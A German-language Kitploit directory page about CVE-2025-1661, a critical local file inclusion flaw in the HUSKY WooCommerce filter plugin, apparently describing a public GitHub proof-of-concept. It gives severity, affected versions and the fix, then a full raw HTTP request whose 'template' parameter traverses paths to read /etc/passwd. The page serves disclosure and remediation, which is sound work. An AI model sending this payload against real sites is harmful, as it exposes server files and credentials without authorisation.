Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1661 — HUSKY – Products Filter Professional für WooCommerce Plugin für WordPress ist anfällig für Local File Inclusion (LFI) | Kitploit
Tools/GitHubGitHub/muhammadwaseem29/cve-2025-1661
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubmuhammadwaseem29/cve-2025-1661

CVE-2025-1661

HUSKY – Products Filter Professional für WooCommerce Plugin für WordPress ist anfällig für Local File Inclusion (LFI)

Repository anzeigen
1vor 1 JahrNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-1661 – Unauthentifizierte Local File Inclusion (LFI) in HUSKY – Products Filter Professional für WooCommerce

Beschreibung

Das HUSKY – Products Filter Professional für WooCommerce-Plugin für WordPress ist in allen Versionen bis einschließlich 1.3.6.5 anfällig für Local File Inclusion (LFI) über den template-Parameter der woof_text_search AJAX-Aktion.

Dadurch können nicht authentifizierte Angreifer beliebige Dateien auf dem Server einbinden und ausführen, was potenziell zu Folgendem führen kann:

  • Umgehung von Zugriffskontrollen
  • Extraktion sensibler Daten
  • Remote Code Execution (RCE) unter bestimmten Bedingungen (z. B. Hochladen von „sicheren“ Dateitypen)

Schweregrad: Kritisch

  • CVSS Score: 9.8 (Kritisch)
  • CWE ID: CWE-22 (Path Traversal)
  • EPS Score: 0.00061
  • Betroffene Versionen

    • Verwundbar: <= 1.3.6.5
    • Behobene Version: 1.3.6.6

    Behebung

    Aktualisieren Sie auf Version 1.3.6.6 oder eine neuere, behobene Version.


    Proof of Concept (PoC)

    Schritte zur Reproduktion

    1. Besuchen Sie die Zielwebsite.
    2. Erfassen Sie die Anfrage mit Burp Suite.
    3. Ändern Sie die Anfragemethode auf POST und fügen Sie die folgende Nutzlast hinzu:
    root@kitploit:~
    POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
    Host: TARGET_SITE_HERE
    Cache-Control: max-age=0
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Cookie: YOUR_SESSION_COOKIE_HERE
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 24
    
    action=woof_text_search&
    

    Screenshot des IntercomVulnCheckers 4. Bei Erfolg gibt der Server den Inhalt von /etc/passwd zurück. 5. Dies kann genutzt werden, um andere sensible Dateien vom Server zu extrahieren.


    Referenzen

    • Wordfence Advisory
    • WordPress Plugin Code
    • CVE Report

    Haftungsausschluss

    Dieses PoC dient ausschließlich Bildungs- und Forschungszwecken. Unbefugte Tests an Systemen ohne Erlaubnis sind illegal und unethisch. Holen Sie stets eine ausdrückliche Genehmigung ein, bevor Sie Sicherheitstests durchführen.

    Tool herunterladen